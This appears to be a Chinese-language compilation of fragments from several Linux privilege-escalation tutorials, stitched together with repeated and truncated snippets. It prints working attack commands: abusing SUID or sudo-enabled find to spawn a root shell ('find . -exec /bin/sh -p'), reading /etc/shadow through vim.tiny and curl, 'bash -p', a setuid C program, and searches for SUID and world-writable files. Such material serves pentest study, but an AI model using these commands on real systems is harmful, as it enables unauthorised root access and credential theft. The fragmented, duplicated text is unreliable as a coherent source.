在Linux系统中,find命令是一个非常有用的工具,可以用于在文件系统中搜索文件和目录。除此之外,find命令还可以用于提升权限,在某些情况下获取root权限。下面将介绍如何使用find命令进行提权。 1. 查找SUID/SGID二进制文件 SUID(Set User ID)和SGID(Set Group ID)是Linux文件系统中的一些特殊权限标志。当这些标志设置...
5. 利用find命令执行命令:另一种利用find命令提权的方法是通过-exec选项执行命令。可以使用以下命令在命令行中执行任意命令: “` find / -name test.txt -exec whoami \; “` 这将查找名为test.txt的文件,并使用whoami命令在命令行中显示当前用户的用户名。通过结合其他命令和技巧,这种方法可以用于执行更复杂的...
通过find命令,用户可以查找具有特定权限的文件或目录,并对其进行操作。例如,查找所有具有SUID权限的文件:find / -perm /4000。 6. sudoedit:sudoedit命令允许用户以超级用户的身份编辑文件。与sudo命令类似,sudoedit需要用户输入密码来获得临时的管理员权限。例如,使用sudoedit编辑文件/etc/hosts:sudoedit /etc/hosts。
(1)在Linux中查找可以用来提权的SUID文件 find / -perm -u=s -type f 2>/dev/null (2)通过find以root权限执行命令 可用作Linux提权的命令及其姿势: #Findfind pentestlab -exec whoami \;#Vimvim.tiny /etc/shadow#awkawk 'BEGIN{system("whoami")}'#curlcurl file:///etc/shadow#Bashbash -p #Les...
Linux提权方法小结 1 find 命令提权 # 1.1 方法一 # find / -perm -g=s -typef 2>/dev/nullfind . -exec/bin/sh -p \;-quit 1.2 方法二 # touchgetshellfind / -typef -name getshell -exec"whoami"\;find / -typef -name getshell -exec"/bin/sh"\;...
find / -writable 2>/dev/null 在找到可写目录中创建脚本demo.c,写入想执行的命令。可以是/bin/bash或C语言等脚本 demo.c的脚本内容 #include<unistd.h> void main() { setuid(0); setgid(0); system("ps"); } 使用使用gcc编译demo.c文件 ...
搜索可以提权的程序,一般有以下 : nmap vimfindBashMoreLess Nano cp 举例:find提权 find / -perm -u=s -typef2>/dev/null 发现find可以利用 普通用户,进入到/tmp目录下,然后新建一个文件。 touchabcd find abcd -execwhoami\; 2.rbash绕过 rbash就是受限制的bash,一般管理员会限制很多命令,例如whoami cd ...
通过以下命令可以列出sudo的权限,从而获得允许低权限用户sudo的二进制文件。 代码语言:javascript 复制 sudo-l 如图所示,可以看出主机sudo配置了二进制文件/bin/find。Find命令是一个比较典型的案例,当find分配了sudo权限时,攻击者可以利用find来执行任意root命令,达到提权的目的。
Linux提权⽅法⼩结1 find 命令提权 1.1 ⽅法⼀ find / -perm -g=s -type f 2>/dev/null find . -exec /bin/sh -p \;-quit 1.2 ⽅法⼆ touch getshell find / -type f -name getshell -exec "whoami" \;find / -type f -name getshell -exec "/bin/sh" \;1.3 ⽅法三...
分时日月周 用户 命令 1. 假如root用户设置了一个计划任务,但是权限没有设置好,比如777权限或者SUID权限之类的,查找命令如下 find / -user root -perm -4000 -print 2>/dev/null 查找SUID文件 find / -perm 777 -print 2>/dev/null 查找777文件 ...